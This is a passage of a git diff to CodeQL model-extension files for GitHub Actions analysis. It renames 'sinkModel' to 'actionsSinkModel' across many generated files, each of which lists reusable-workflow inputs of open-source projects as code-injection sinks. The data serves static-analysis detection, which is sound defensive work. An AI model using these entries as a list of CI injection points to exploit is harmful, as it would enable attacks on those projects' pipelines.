diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index a6f1bd4569db..418694a596d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index b661a1fa26aa..10c4f8a3e3c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 0f58971041d4..1837a505499e 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index f12a337d71dd..094e4602e8e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 76796b4ae383..ec264f96bf16 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 8cc08edff5d6..7463396b1522 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index c2963eb76f45..4c52a10d4f1d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 66aea90b41a6..a6c5a8b8e3bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 49ed7bca899b..286e75fc9e20 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index fd0a2d9110a9..9ea5a9a34c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 1a3bdd1b3803..34e41e9c589d 100644 
--- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 6185f9d03d05..cc38156973bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 273bbc695405..748287e75f82 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 3aac3af3cae6..703a138d28d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 9887b8e5f3ae..97f1bafd1f38 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 4c6379fd94b1..064c946363f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 35738fe6c0f8..4a5c66bc7440 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 77db768cf32e..a1e4b624b454 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 509de9546464..888aed947da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6e0e2865e83c..3b5f69e93423 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 69667ce10b10..8e28b46f2c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 175012c10c94..7f63b48ed848 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 84a834d9a1f0..e7e42031e047 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 2946a78cf835..0c34609ccefc 100644 
--- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 7ce68d84ca5e..82de946e406e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 8e3b9ccc0f8a..09c4c2a83c31 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index f41e2ee12461..0e4571fc728b 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index c643a6a9fe06..6a03acfb11dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 9aad213b1dfe..f41ee1211d3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 1906ef45379e..8a64c0ce5f11 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index f5ce50243f7c..18e66bf72913 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 58c30f3cd026..1ed7561a5334 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index d6c0ced50a6a..738fde2cb865 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index fdcb8775dad4..c61a63f11443 100644 
--- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 66889d2cf428..fef036f4f297 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index e5c5cfeabd37..b13ba8bc40f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 4dc3fc2bc98f..3fb2fefff6b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 52c4b4c7a24c..4344e254be05 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 038f92a53172..2a7c5feafead 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 6fab83acf59a..9ccb41c3a8c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 238856cc7b9b..b71e6c001d00 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 71b584f54275..ff0695c0ef25 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
